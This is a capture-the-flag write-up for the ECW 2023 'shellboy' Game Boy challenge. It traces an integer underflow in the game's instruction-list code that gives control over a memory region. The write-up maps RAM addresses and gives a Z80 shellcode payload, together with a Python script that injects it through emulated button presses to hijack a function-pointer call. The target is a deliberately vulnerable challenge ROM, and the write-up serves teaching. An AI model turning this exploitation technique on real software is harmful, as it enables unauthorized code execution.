shellboy (Game Boy Pwn)

This is a challenge from the ECW 2023.

We are provided with a Game Boy ROM, its sources and a web emulator that can be controlled with a python script (neat).

The goal of the game is to move a character to a flag inside a maze by given it a list of instructions and the number of times each instruction must be repeated. Of course, because it is a CTF challenge, the game cannot be won by playing by the rules: the flag to reach is surrounded by walls.

A gameboy with a maze on the screen. There is a small deamon head on the top left of the maze, and a flag surrounded by walls in the center. above the maze, there are two rectangle. The left rectangle contains the words “No inst”, the right rectangle is empty

Game Control:

Add an instruction

Press the A key to add an instruction, then press any directional key. This will add the instruction to the instruction list. You can add up to 16 instructions.

Repeat an instruction

Press the UP or DOWN arrow to indicate how many times the selected instruction should be repeated.

Navigate in the instruction list

Press the LEFT or RIGHT arrow to move the selection cursor through the instruction list.

Delete an instruction

Position the cursor on the instruction to be deleted, then press B. The instruction will be removed.

Move / Merge two instructions

Position the cursor on the instruction to be moved, then press SELECT. Move the cursor to the desired position and press SELECT again. If the two selected instructions are identical, they will be merged. Otherwise, their positions will be switched.

Launch ShellBoy !

Press START to tell ShellBoy to follow your instructions.

The Vulnerability

I started by playing the game a little. Unsurprisingly, no way to win, but I noticed something strange with the move/merge option: when merging an instruction with itself (by pressing SELECT two times), the instruction is removed, and the cursor that select the instruction stay at the same position. Better, we can still change the count value of the now non existing instruction. However, we can only move the cursor to the left, in the direction of the remaining instruction.

A gameboy with a maze on the screen. Above the maze, the left rectangle contains a right arrow and an up arrow, followed by a doted square indicated a cursor. The cell selected by the cursor is empty. The right rectangle indicate “x246”, indicating that even if the instruction is not set, the count value can still be modified

A this point my inner chaos monkey just kept pressing the SELECT button until the was no more instruction in the list. Then I did it again, and surprise! Now the list is full of arrow and we can move the cursor to the right again!

A gameboy with a maze on the screen. Above the maze, the left rectangle contains the words a right arrow followed by 10 up arrows. The right rectangle indicate “x0”

Ok, time to look at the code. The control of the instruction list is defined in inst_list.c. The one function call that interest us is move_inst(inst_cursor_pos, selected_index):

void move_inst(uint8_t inst1_index, uint8_t inst2_index)
{
    uint8_t inst1_id = inst_ids[inst1_index];
    uint8_t inst2_id = inst_ids[inst2_index];
    ...
    if(inst1_id == inst2_id)
    {
        uint16_t rpt_sum = inst1_rpt + inst2_rpt;

        if(rpt_sum > 255)
            ...
        else
        {
            ...
            remove_inst(inst2_index);
        }
    }
    else
        ...
}

We can see that when merging two stack, the second one is delete if the sum is small enough, even when the two stacks are in fact the same!

void remove_inst(uint8_t inst_index)
{
    ...
    inst_count--;
}

...
        else if(KEY_TRIGGERED(J_B) && !list_empty)
        {
            remove_inst(inst_cursor_pos);
            list_empty = inst_count == 0;
            inst_cursor_pos = 0;
        }

We can notice that remove_inst decrement inst_count, without checks, and do not touch inst_cursor_pos nor list_empty, instead, those are updated when pressing the button B, after calling remove_inst. This is not done in move_inst after calling remove_inst.

Here is the explanation of the strange behaviour: remove_inst do not update inst_count nor list_empty, and move_inst assumes there are at least two instructions in the list, which is false: they can be one, or even zero instructions, so inst_count can underflow, while list_empty stay false and inst_cursor_pos can stay out of bound.

How can we use that? Let’s take a look at the other action the user can do:

    ...
        if(KEY_TRIGGERED(J_LEFT))
        {
            inst_cursor_pos -= (inst_cursor_pos > 0) ? 1 : 0;
        }
        // Select next instruction
        else if(KEY_TRIGGERED(J_RIGHT))
        {
            inst_cursor_pos += (inst_cursor_pos < inst_count - 1) ? 1 : 0;
        }
        // Increase instruction repetition
        else if(KEY_TRIGGERED(J_UP) && !list_empty)
        {
            inst_rpt[inst_cursor_pos] += (inst_rpt[inst_cursor_pos] < 255) ? 1 : 2;
        }
        // Decrease instruction repetition
        else if(KEY_TRIGGERED(J_DOWN) && !list_empty)
        {
            inst_rpt[inst_cursor_pos] -= (inst_rpt[inst_cursor_pos] > 1) ? 1 : 2;
        }
    ...

We can move the cursor between 0 and inst_count, and set the value of inst_rpt[inst_cursor_pos] from 1 to 255.

(There is also a mode to enter new instruction, but inst_count is checked against MAX_INST so it not really useful)

At this point we need to find out the memory mapping of the variable. I used Sameboy, a emulator/debugger for Game Boy, to dump the memory after setting inst_rpt to a recognisable value (by playing the game):

$ sameboy shellboy.gb > dump.mem
SameBoy v0.15.8
x/65535 $0000

$ grep -A 1 -B 1 '01 02 03 04' dump.mem
c0a0: 01 00 00 ea 03 9c 00 00 00 00 00 00 00 00 00 00
c0b0: 00 0e 02 07 02 14 02 00 02 01 02 03 04 05 06 07
c0c0: 08 09 0a 0b 0c 0d 0e 0f 00 00 00 00 00 00 00 00

I found that inst_rpt starts at 0xc0b9, and from here, by combining watch points, backtraces, the disassembled values in memory (cf Samboy documentation), the source code and a good amount of time and effort, I mapped a few value in memory:

address	value	symbol
0xC0B1	0x0e	`inst_funcs`
0xC0B2	0x02
0xC0B3	0x07
0xC0B4	0x02
0xC0B5	0x14
0xC0B6	0x02
0xC0B7	0x00
0xC0B8	0x02
0xC0B9	–	`inst_rpt`
0xC0BA	–
0xC0BB	–
0xC0BC	–
0xC0BD	–
0xC0BE	–
0xC0BF	–
0xC0C0	–
0xC0C1	–
0xC0C2	–
0xC0C3	–
0xC0C4	–
0xC0C5	–
0xC0C6	–
0xC0C7	–
0xC0C8	–
0xC0C9	–	`inst_ids`
0xC0CA	–
0xC0CB	–
0xC0CC	–
0xC0CD	–
0xC0CE	–
0xC0CF	–
0xC0D0	–
0xC0D1	–
0xC0D2	–
0xC0D3	–
0xC0D4	–
0xC0D5	–
0xC0D6	–
0xC0D7	–
0xC0D8	–
0xC0D9	0xFF	`inst_count`
0xC0DA	0xXX	`inst_cursor_pos`
0xC0DB	0x00	`selected_index`
0xC0DC	0x00	`listen_new_inst`
0xC0DD	0x00	`is_moving_inst`
0xC0DE	0x00	`list_empty`
0xC0DF	?
0xC0E0	?
0xC0E1	0x01	`bot_x`
0xC0E2	0x01	`bot_y`

I also noted the code that display the victory message and then loop, could be useful:

    0e8d: LD de, $0ed9
    0e90: PUSH de
    0e91: LD hl, $1204
    0e94: PUSH hl
    0e95: LD a, $01
    0e97: PUSH af
    0e98: INC sp
    0e99: CALL $10c0
    0e9c: ADD SP, $05
    0e9e: LD de, $0064
    0ea1: CALL $139b
    0ea4: JR $0e9e

Interesting, bot_x and bot_y are after inst_rpt and not to far away. This means we can change the values of the bot ourself. Before pressing start, we have to put back inst_count to a reasonable value, else the game crashes (we will see why later). Pression SELECT many time will do that.

Arbitrary Code Execution

We beat the game! But still no flag. Sad. Instead, we have the address of the flag in memory, in a location way too far from the region we control.

We saw previously that this code is run when we win:

    0e8d: LD de, $0ed9
    0e90: PUSH de
    0e91: LD hl, $1204
    0e94: PUSH hl
    0e95: LD a, $01
    0e97: PUSH af
    0e98: INC sp
    0e99: CALL $10c0
    0e9c: ADD SP, $05
    0e9e: LD de, $0064
    0ea1: CALL $139b
    0ea4: JR $0e9e

Notice CALL $10C0, this is the function that display the text whose address is stored in the register DE (here, 0x0ED9). It would be nice if we could change the 0x0ED9 to 0x06FA in the code, by the location (0x0E8D) is still to far away, and anyway, this memory section is mapped from the ROM and is read only. We need more than just overriding variables, we need arbitrary code execution.

We need to find a way to set the value of the program pointer. The stack is around 0xDFE0, so we can’t override the return pointer. However, during the simulation, there is one point where the program call a function whose address is read from a variable:

void simulate()
{
    for(uint8_t i = 0; i < inst_count; i++)
    {
        uint8_t inst_id = inst_ids[i];
        uint8_t inst_rp = inst_rpt[i];

        for(uint8_t j = 0; j < inst_rp; j++) {
            if(inst_funcs[inst_id]()) {
                draw_simu();
                delay(100);
            }
        }
    }
    ...
}

We saw that inst_funcs is located at 0xC0B1, juste before inst_rpt, so we cannot override the addresses of the functions inside inst_funcs. Luckily, we don’t need to, because the function to call is selected by inst_id, which is located in inst_ids, juste after inst_rpt. Usually, inst_id is between 0 and 3, but with our first exploit, we can set it to any value, let say, 4. Conveniently, inst_funcs[4] correspond to the values stored at 0xC0B9: the first two octets of inst_rpt.

Earlier, we noticed the game crashed when running the simulation with an inst_count set to 0xFF. This was due to the value of inst_ids[i] being some random value, causing the program counter to jump somewhere in the RAM that probably did not contained any actual code.

So here we are, we can set the program pointer to an arbitrary value, we control a space in memory, we can write our code in memory and jump in it. I had to refresh my Z80 a little to write my payload, mostly because I only had 30 octets with an arbitrary value in the middle. (Latter someone pointed out that 0x04 is the instruction INC B, so basically a NOP in our situation, and in another write-up someone juste removed a lot of the code I used by just jumping at 0x0E90 after setting DE. I’m a little stupid, so my solution is more complex than it needs to, but hey, it works).

So here is the state of the memory after we set it:

address	value	symbol/disassemble
0xC0B1	0x0e	`inst_funcs`
0xC0B2	0x02
0xC0B3	0x07
0xC0B4	0x02
0xC0B5	0x14
0xC0B6	0x02
0xC0B7	0x00
0xC0B8	0x02
0xC0B9	0xBB	`inst_rpt`
0xC0BA	0xC0
0xC0BB	0x11	`LD DE, $06FA`
0xC0BC	0xFA
0xC0BD	0x06
0xC0BE	0xD5	`PUSH DE`
0xC0BF	0x21	`LD HL, $1204`
0xC0C0	0x04
0xC0C1	0x12
0xC0C2	0xE5	`PUSH HL`
0xC0C3	0x00	`NOP`
0xC0C4	0x00	`NOP`
0xC0C5	0x00	`NOP`
0xC0C6	0xC3	`JMP $C0CA`
0xC0C7	0xCA
0xC0C8	0xC0
0xC0C9	0x04	`inst_ids`
0xC0CA	0x3E	`LD A, $01`
0xC0CB	0x01
0xC0CC	0xF5	`PUSH AF`
0xC0CD	0x33	`INCR SP`
0xC0CE	0xCD	`CALL $10C0`
0xC0CF	0xC0
0xC0D0	0x10
0xC0D1	0xC3	`JMP $0E9C`
0xC0D2	0x9E
0xC0D3	0x0E
0xC0D4	–
0xC0D5	–
0xC0D6	–
0xC0D7	–
0xC0D8	–
0xC0D9	0xFF	`inst_count`
0xC0DA	0x00	`inst_cursor_pos`
0xC0DB	0x00	`selected_index`
0xC0DC	0x00	`listen_new_inst`
0xC0DD	0x00	`is_moving_inst`
0xC0DE	0x00	`list_empty`
0xC0DF	?
0xC0E0	?
0xC0E1	0x01	`bot_x`
0xC0E2	0x01	`bot_y`

This time no need to set inst_count to a sensible value, the first instruction will trigger our injected code which print the flag before jumping into an infinite loop.

$A GIF of a screen of a Game Boy. Above the maze, we can see a right arrow appear, then disappear. After that, the list of instructions is filled with up arrow. The cursor then scroll to the right approximately 30 times. For each instruction, the counter is set to a specific value. The cursor then go back to the beginning of the list, and “ECW{R3Tr0_Gb_RcE!}” appears between the maze and the instruction list. The robot in the maze does not move from the top left corner.$

Here is my code to automate the hack:

def win_game():
    press_button(BUTTON_A)
    press_button(BUTTON_RIGHT_ARROW)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)

    for _ in range(40):
        press_button(BUTTON_RIGHT_ARROW)
    for _ in range(5):
        press_button(BUTTON_UP_ARROW)
    press_button(BUTTON_RIGHT_ARROW)
    for _ in range(3):
        press_button(BUTTON_UP_ARROW)
    for _ in range(41):
        press_button(BUTTON_LEFT_ARROW)
    for i in range(250):
        press_button(BUTTON_SELECT)
        press_button(BUTTON_SELECT)

    press_button(BUTTON_START)

def write_code(code: bytes):
    for b in code:
        for _ in range(b):
            press_button(BUTTON_UP_ARROW)
        press_button(BUTTON_RIGHT_ARROW)
    for _ in code:
    press_button(BUTTON_LEFT_ARROW)

def display_flag():
    press_button(BUTTON_A)
    press_button(BUTTON_RIGHT_ARROW)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)

    write_code(
        bytes(
            [
                0xBB,
                0xC0,
                0x11,
                0xFA,
                0x06,
                0xD5,
                0x21,
                0x04,
                0x12,
                0xE5,
                0,
                0,
                0,
                0xC3,
                0xCA,
                0xC0,
                0x04,
                0x3E,
                0x01,
                0xF5,
                0x33,
                0xCD,
                0xC0,
                0x10,
                0xC3,
                0x9E,
                0x0E,
            ]
        )
    )
    press_button(BUTTON_START)

display_flag()

Optimizations

For the impatiens ones, I was sent by 0xskav an optimized version of write_code:

def write_code(code: bytes):

    for b in code:
        a = 255 - b

        down = False
        if a < b:
            down = True
            b = a
        for _ in range(b):
            if(down == False):
                press_button(BUTTON_UP_ARROW)
            else:
                press_button(BUTTON_DOWN_ARROW)

        press_button(BUTTON_RIGHT_ARROW)

    for _ in code:
        press_button(BUTTON_LEFT_ARROW)

And while we are at it with optimizations, we can use the shorter code injection used by !AlphaTartine:

address	value	symbol/disassemble
0xC0BB	0x11	`LD DE, $06FA`
0xC0BC	0xFA
0xC0BD	0x06
0xC0BE	0xC3	`JMP $0E90`
0xC0BF	0x90
0xC0C0	0x0E

def display_flag():
    press_button(BUTTON_A)
    press_button(BUTTON_RIGHT_ARROW)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)
    press_button(BUTTON_SELECT)

    write_code(
        bytes(
            [
                0xBB,
                0xC0,
                0x11,
                0xFA,
                0x06,
                0xC3,
                0x90,
                0x0E,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0,
                0x04,
            ]
        )
    )
    press_button(BUTTON_START)